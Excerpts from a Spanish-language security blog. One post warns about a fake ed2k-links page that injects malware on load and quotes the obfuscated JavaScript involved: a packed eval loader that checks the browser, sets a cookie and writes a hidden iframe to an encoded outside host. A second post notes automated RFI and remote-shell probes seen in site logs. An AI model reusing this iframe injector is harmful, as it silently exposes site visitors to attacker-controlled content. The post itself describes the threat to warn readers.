Ésta página web de supuestos enlaces ed2k, cada vez que es refrescada o cargada intenta inyectar código detectado por las firmas de algunos antivirus como HTML Small.bkr.106, iframe o Trojan.

(<body bgcolor=”#000000″ text=”#000001″><script>sa=”%6B%73%69%65%6E%61%2E%6E%65%74″;eval(function(p,a,c,k,e,d){while(c–){if(k[c]){p=p.rep______(new RegExp(‘\\b’+c.toString(a)+’\\b’,'g’),k[c])}}return p}(‘a(0.4.7(“5=s”)==-1&&9.8.7(“f 6″)!=-1){0.4=”5=s; e=c, 2 g b 2:d:h p; “;0.r(“<3 q=1 t=1 o=\’n://”+j+”/i/\’ k=\’l:m\’></3>”)}’,30,30,’document||14|iframe|cookie|_mlsdkf||indexOf|appVersion|navigator|if|2015…

…Mon|15|expires|MSIE|Jul|26|b2b|sa|style|display|none|http|src|GMT|width|write||height’.split(‘|’)));</script>
<p align=”center” style=”line-height: 0; margin-top: -1; margin-bottom: -1″><font face=”Trebuchet MS” color=”#000000″ style=”font-size: 1pt”>)

El dominio es el siguiente: En la raíz somos redireccionados a éste otro dominio.

Read the rest of this entry

Es gracioso encontrarte a diario en el log del site bastantes intentos de incursiones RFI, consolas remotas… Basura variada para webs escritas en PHP que utilizan variables del tipo /?p=*** para intentar hacerse con una consola remota, sacar nuestro HASH, etc. Es una pena que éstos atáques no se realzien desde conexiones y pc domésticas, en éste caso son automatizados y desde servers remotos desde donde los atacantes relizan los actos, incluso desde webs que todavía no saben que su seguridad ha sido comprometida y que a su vez sirven para realizar ataques RFI. Read the rest of this entry